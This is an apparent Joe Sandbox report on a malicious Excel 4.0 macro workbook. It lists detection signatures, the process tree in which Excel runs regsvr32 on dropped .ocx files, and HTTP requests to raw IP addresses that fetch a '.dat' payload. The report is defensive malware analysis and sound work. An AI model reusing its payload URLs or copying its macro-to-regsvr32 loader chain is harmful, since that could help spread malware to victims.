Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ComplaintDetails-1244065104-Nov-17.xlsb

Overview

General Information

Sample Name:ComplaintDetails-1244065104-Nov-17.xlsb
Analysis ID:532936
MD5:cfee2afbf9c7456b62417ccf80e70009
SHA1:2d43d6ad54fb33ce77467394e621963d528cc57f
SHA256:0a7656fab771936b9586b8b90ebe9d38f34fa64d8e465f3f53c4df20f3c1ca44
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6316 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 1740 cmdline: regsvr32.exe ..\Tot1.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6344 cmdline: regsvr32.exe ..\Tot2.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6736 cmdline: regsvr32.exe ..\Tot3.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32.exe ..\Tot1.ocx, CommandLine: regsvr32.exe ..\Tot1.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6316, ProcessCommandLine: regsvr32.exe ..\Tot1.ocx, ProcessId: 1740

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: ComplaintDetails-1244065104-Nov-17.xlsbVirustotal: Detection: 45%Perma Link
    Source: ComplaintDetails-1244065104-Nov-17.xlsbReversingLabs: Detection: 39%
    Multi AV Scanner detection for domain / URLShow sources
    Source: http://185.138.164.244/Virustotal: Detection: 6%Perma Link
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.4:49768 -> 190.14.37.101:80
    Source: global trafficTCP traffic: 192.168.2.4:49768 -> 190.14.37.101:80
    Source: excel.exeMemory has grown: Private usage: 1MB later: 69MB
    Source: global trafficHTTP traffic detected: GET /44532.8765170139.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.101Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44532.8765170139.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.138.164.244Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.101
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.101
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.101
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.101
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.114.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.114.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.114.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.138.164.244
    Source: unknownTCP traffic detected without corresponding DNS query: 185.138.164.244
    Source: unknownTCP traffic detected without corresponding DNS query: 185.138.164.244
    Source: unknownTCP traffic detected without corresponding DNS query: 185.138.164.244
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.101
    Source: unknownTCP traffic detected without corresponding DNS query: 185.138.164.244
    Source: unknownTCP traffic detected without corresponding DNS query: 185.138.164.244
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.101
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 20:02:12 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 20:02:34 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: http://185.138.164.244/
    Source: EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830841555.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792303389.0000000015294000.00000004.00000001.sdmpString found in binary or memory: http://185.138.164.244/44532.8765170139.dat
    Source: EXCEL.EXE, 00000000.00000003.656762387.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.657190666.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712700929.0000000015294000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829061292.0000000015322000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.828753407.0000000015491000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830576983.0000000015491000.00000004.00000001.sdmp, sheet1.binString found in binary or memory: http://185.138.164.244/E
    Source: EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: http://185.81.114.236/
    Source: EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: http://185.81.114.236/3321935-2125563209-4053062332-1002c
    Source: EXCEL.EXE, 00000000.00000003.886889472.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791754517.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.984241011.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830841555.000000001528F000.00000004.00000001.sdmpString found in binary or memory: http://185.81.114.236/44532.8765170139.dat
    Source: EXCEL.EXE, 00000000.00000003.886889472.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791754517.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.984241011.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830841555.000000001528F000.00000004.00000001.sdmpString found in binary or memory: http://185.81.114.236/44532.8765170139.dat_
    Source: EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: http://185.81.114.236/5563209-4053062332-1002
    Source: EXCEL.EXE, 00000000.00000003.829061292.0000000015322000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.828753407.0000000015491000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830576983.0000000015491000.00000004.00000001.sdmp, sheet1.binString found in binary or memory: http://185.81.114.236/C
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: http://185.81.114.236/X
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.727771592.0000000015232000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: http://190.14.37.101/
    Source: EXCEL.EXE, 00000000.00000003.886889472.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791754517.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.984241011.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830841555.000000001528F000.00000004.00000001.sdmpString found in binary or memory: http://190.14.37.101/44532.8765170139.dat
    Source: EXCEL.EXE, 00000000.00000003.886889472.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791754517.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.984241011.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830841555.000000001528F000.00000004.00000001.sdmpString found in binary or memory: http://190.14.37.101/44532.8765170139.dat#
    Source: EXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmpString found in binary or memory: http://190.14.37.101/44532.8765170139.datO
    Source: EXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmpString found in binary or memory: http://190.14.37.101/44532.8765170139.datS
    Source: EXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791754517.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmpString found in binary or memory: http://190.14.37.101/44532.8765170139.datc
    Source: EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: http://190.14.37.101/53321935-2125563209-4053062332-1002y
    Source: EXCEL.EXE, 00000000.00000003.829061292.0000000015322000.00000004.00000001.sdmp, sheet1.binString found in binary or memory: http://190.14.37.101/A
    Source: EXCEL.EXE, 00000000.00000003.656762387.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.657190666.000000001528F000.00000004.00000001.sdmpString found in binary or memory: http://190.3
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: EXCEL.EXE, 00000000.00000002.980113337.000000000D38F000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagramitT
    Source: EXCEL.EXE, 00000000.00000002.980113337.000000000D38F000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
    Source: EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.co
    Source: EXCEL.EXE, 00000000.00000003.829481826.0000000012C79000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.828673891.0000000015551000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829005283.000000001550D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
    Source: EXCEL.EXE, 00000000.00000003.828673891.0000000015551000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
    Source: EXCEL.EXE, 00000000.00000003.829481826.0000000012C79000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829005283.000000001550D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadC
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
